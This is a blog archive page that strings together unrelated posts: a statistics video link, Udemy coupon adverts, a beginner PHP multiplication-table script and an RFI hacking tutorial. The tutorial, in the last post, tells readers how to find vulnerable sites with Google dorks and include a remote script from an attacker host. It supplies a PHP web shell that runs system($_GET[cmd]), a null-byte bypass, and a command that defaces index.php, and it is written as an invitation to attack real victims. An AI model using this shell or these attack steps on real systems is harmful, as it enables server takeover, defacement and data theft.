Showing posts with label simple. Show all posts
Showing posts with label simple. Show all posts

Monday, April 10, 2017

2min 24sec clip of a simple explanation of bellcurve distribution in maths statistics

2min 24sec clip of a simple explanation of bellcurve distribution in maths statistics




found via digg

Available link for download

Read more »

Tuesday, March 14, 2017

50 off Simple Website Traffic Generation Strategies course coupon 10

50 off Simple Website Traffic Generation Strategies course coupon 10


Drive new website traffic in ANY niche with these underutilized FREE and paid platforms.
Lectures 20

Video 3 hours

Skill Level All Levels

Languages English

Includes Lifetime access

30 day money back guarantee!

Available on iOS and Android

Certificate of Completion


It’s no secret. Trying to drive traffic at will to sell products, build a list and makeaffiliate commissions is extremely difficult.


As you struggle to overcome the traffic puzzle, you’re often met with headaches and roadblocks. Finding a solution seems impossible.


Maybe, like us, you’ve:


Tried multiple paid sources like FB ads which ended up in frustration, debt and nothing to show for your efforts

Tried dozens of free traffic sources which only resulted in a massive waste of time and energy

Bought course after course on traffic which led to more wasted money and frustration


It’sreally no wonder that most people who try to drive traffic  to sell products, build a list and make affiliate commissions simply give up.


But the truth is…


Finally Being Able To Send Floods Of Buying Traffic To Your Offers Is MUCH Closer Than You Think!


We’ve been down the same road and these days, things have gotten much better…


We’re finally able to drive high quality, converting traffic anywhere we choose at will, and we can also sell more products for profit. We’re even lucky enough to say we can now build our lists faster than ever, risk free.


But we’ve NEVER forgotten the frustration before seeing any improvement.


Having Tried It ALL, We Were Beaten Down and Ready To Throw In The Towel…


Roadblocks were a constant reality.


What stopped us DEAD IN OUR TRACKS was that we were afraid to keep WASTING TIME & MONEY trying traffic sources that just don’t work.


We just didn’t know, back then, that there are UNTAPPED traffic sources that give AMAZING results. We were afraid of not getting ANY returns from our traffic driving efforts.


Of course, we’re sure you know EXACTLY what we mean.


You couldn’t blame us for wanting to give up when this sounds so familiar to you:


You’ve tried multiple paid sources which just resulted in frustration, debt and nothing to show for your efforts

You’ve tried dozens of free traffic sources which led to a massive waste of time and energy. You’ve bought course after course on traffic which all ended up in more wasted money and frustration…


They say the definition of insanity is expecting the same action to produce different results. Well, being fairly sane, we were fresh out of ideas. And nothing worked.


But before we pulled the plug entirely…


Something happened that changed everything!


We were steps away from giving up when we were networking with some TRAFFIC GIANTS and learned they were using completely UNDERUTILIZED and EVERGREEEN sources to drive traffic…


And once WE tapped into these secret sources, we couldn’t believe our success. After making SO MANY MISTAKES, we couldn’t believe we’d stumbled upon the answer.


However, knowing we weren’t the only ones suffering from this traffic problem, we had to share our formula for success.


After all, we’re nothing special. We didn’t deserve this success anymore than anyone else. We just had a stroke of luck that came our way.


Which is WHY we’re so glad YOU’VE stumbled your own way to this course. We can’t wait to introduce you to Simple Website Traffic Generation Strategies…


Here’s a quick recap of everything you’ll receive when you secure your training right now:


A COMPLETE package of 13 different traffic sources, free & paid, that are largely untapped and bring fantastic results.

Step by step over the shoulder video training.

3 of our personal BEST traffic sources included.

Created by marketers that use these methods every day.

Proven results.

Drive engaged visitors in any niche.

Untapped and undervalued traffic sources that deliver.

New website traffic generation sources being added each month as we uncover them.


What Makes This Course Unique?


We’ve got your back. You’ll have a dedicated team of three instructors ready to answer any question you have, or describe something in more detail for you.


As with our other courses, this one will be updated over time wit


Shane Farrell

Brian Gray

Mark Tandan coupons
Marketing course coupon
Marketing Fundamentals course coupon
Simple Website Traffic Generation Strategies
Simple Website Traffic Generation Strategies course coupon
Simple Website Traffic Generation Strategies coupon
Udemy coupons
Udemy coupon code
Udemy courses
free coupons
Udemy free courses
Udemy free coupon



Available link for download

Read more »

Wednesday, December 21, 2016

A simple PHP Dynamic Multiplication Table

A simple PHP Dynamic Multiplication Table


A simple PHP Dynamic Multiplication Table

By Alexies Iglesia


Using PHP we can build a lot of great web applications and websites. With your knowledge in HTML, CSS, Javascript, jQuery and other web development tools, you can make almost everything you want.

Today Im going to give you a simple code on how to make a simple multiplication table using PHP. It has two pages. The first page will get the input from the user, while the second page will show the output.

I used this as an introductory lesson for my student at Mondriaan Aura College. But starting from now,  Ill gonna share some of my resources online for the benifits of a lot of beginners who wants to study this code. 

For those who want to download the file, download it here
1st PAGE ("page1.php")

Code: 
        <!DOCTYPE html>
        <html>
        <head>
         <title></title>
        </head>
        <body>
                <form action = "page2.php" method="POST">
                        X value<input name="x"type="number" /><br/>
                        y value<input name="y" type="number" /><br/>
                        <input type="submit" value="Generate">
                </form>
        </body>
        </html>


2nd PAGE ("page2.php")

Code: 
        <!DOCTYPE html>
        <html>
         <head>
         <title></title>
         </head>
         <body>
         <?php
         $x=$_POST[x];
         $y=$_POST[y];

         for ($i=1;$i<=$y;$i++){
         echo "<table border=1 ><tr ><td width=30px>".$i."</td>";
        for ($a=2,$b=1;$b<$x;$b++,$a++){
         echo "<td width=30px >".$a*$i."</td>";
        }
        echo "</tr></table>";
        }
        ?>
         </body>
        </html>




Available link for download

Read more »

Monday, November 7, 2016

50 off Learn Vue JS introduction to simple reactive JavaScript course coupon 10

50 off Learn Vue JS introduction to simple reactive JavaScript course coupon 10


Starting point introduction to Vuejs and how to use Vuejs to create interactive dynamic content via JavaScript and Vuejs
Lectures 29

Video 1.5 hours

Skill Level Beginner Level

Languages English

Includes Lifetime access

30 day money back guarantee!

Available on iOS and Android

Certificate of Completion


Welcome to using Vuejs


This course is an introduction to using Vuejs which is a JavaScript library that provide easy to use reactive technology.  Its the perfect starting point for more complex frameworks such as Angular.  


Learn to create reactive JavaScript applications. 


Vuejs lets you use you data effectively binding data to the DOM and using it within HTML elements.  


Vuejs is flexible, simple and easy to use.   You will be amazed at what you can do with Vuejs and how easy it is.   Its similar to angularjs but much much easier to get the hang of.  Use Vuejs to bind data to the DOM and sync to create reactive effects.  Once binding is setup the DOM keeps data and elements in sync.  


Course covers an introduction on how to get started with Vuejs

How to add vuejs to your web application.

Creating a vue instance

Data binding with Vue

Working with Lists

Adding events

Filters and components

Default Vue Directives that perform cool stuff right out of the box

Vuejs source code included.


Reactive technology is in demand, it makes web applications more functional.  This course will get you started creating your own reactive applications.  Start binding your data and create amazing effects for your application users.  Lets get started today.


Full details

create amazing applications with Vuejs

learn about reactive JavaScript and how to use it

Starting point for more complex frameworks like AngularJS


Full details

Web developers who want to learn vuejs

Web application builders

JavaScript developers


Laurence Svekis coupons
Development course coupon
Programming Languages course coupon
Learn Vue JS introduction to simple reactive JavaScript
Learn Vue JS introduction to simple reactive JavaScript course coupon
Learn Vue JS introduction to simple reactive JavaScript coupon
Udemy coupons
Udemy coupon code
Udemy courses
free coupons
Udemy free courses
Udemy free coupon



Available link for download

Read more »

Monday, October 10, 2016

A simple tutorial on Remote File Inclusion RFI

A simple tutorial on Remote File Inclusion RFI


RFI stands for Remote File Inclusion, and it allows the attacker to upload a custom coded/malicious file on a website or server using a script. A simple tutorial to Remote File Inclusion (RFI) - theprohack.comThe vulnerability  exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript). This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of tutorial, i suppose you will know what it is all about and may be able to deploy an attack or two.

RFI is a common vulnerability, and trust me all website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and do almost anything (including gagging them out or beg..well thats an exaggeration but I guess you get the idea :P ) . What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one, some BASH might come handy as most of servers today are hosted on Linux..

Okay..Lets start..The first step is to find vulnerable site..you can easily find them using Google dorks..If you dont have any idea, you might want to read about advanced password hacking using Google dorks or to use automated tool to apply Google dorks using Google. Now lets assume we have found a vulnerable website

http://victimsite.com/index.php?page=home

As you can see, this website pulls documents stored in text format from server and renders them as web pages. We can find ways around it as it uses PHP include function to pull them out..check it out.

http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txt

I have included a custom script “eveilscript” in text format from my website, which contains some code..Now..if its a vulnerable website, then 3 cases happen -

  • Case 1 - You might have noticed that the url consisted of “”page=home” had no extension, but I have included an extension in my url,hence the site may give an error like “failure to include evilscript.txt.txt”, this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  • Case 2 - In case, it automatically appends something in the lines of .php then we have to use a null byte “%00” in order to avoid error.
  • Case 3 – successfull execution :)

Now once you have battled around this one, you might want to learn what to code inside the script. You may get a custom coded infamous C99 script (too bloaty but highly effective once deployed) or you might code yourself a new one. For this knowledge of PHP might come in handy. Here we go

<?php

echo "<script>alert(U 4r3 0wn3d !!);</script>";
echo "Run command: ".htmlspecialchars($_GET[cmd]);

system($_GET[cmd]);

?>

The above code allows you to exploit include function and tests if the site if RFI (XSS) vulnerable by running the alert box code and if successful, you can send custom commands to the linux server in bash. So…If you are in luck and if it worked, lets try our hands on some Linux commands. For example to find the current working directory of server and then to list files, we will be using “pwd” and “ls” commands.

http//victimsite.com/index.php?cmd=pwd&page=http://hackersite.com/ourscript

http//victimsite.com/index.php?cmd=ls&page=http://hackersite.com/ourscript

What it does is that it sends the command as cmd we put in our script, and begins print the working directory and list the documents..Even better..you can almost make the page proclaim that you hacked it by using the “echo” command..

cmd=echo U r pwn3d by xero> index.php

It will then re-write the index.php and render it..In case,its a primitive website which stores pages with .txt extension, you might want to put it with along the .txt files.Now..as expected..We are now the alpha and the omega of the website :) we can download, remove, rename, anything! Want to download stuff ? try the “wget” function (cmd=wget.. get the idea..)..Want to move it out ? “mv”..

I leave the rest on your creativity..

 

Like This post ?  You can buy me a Beer :)

Posted by XERO. ALL RIGHTS RESERVED.


Available link for download

Read more »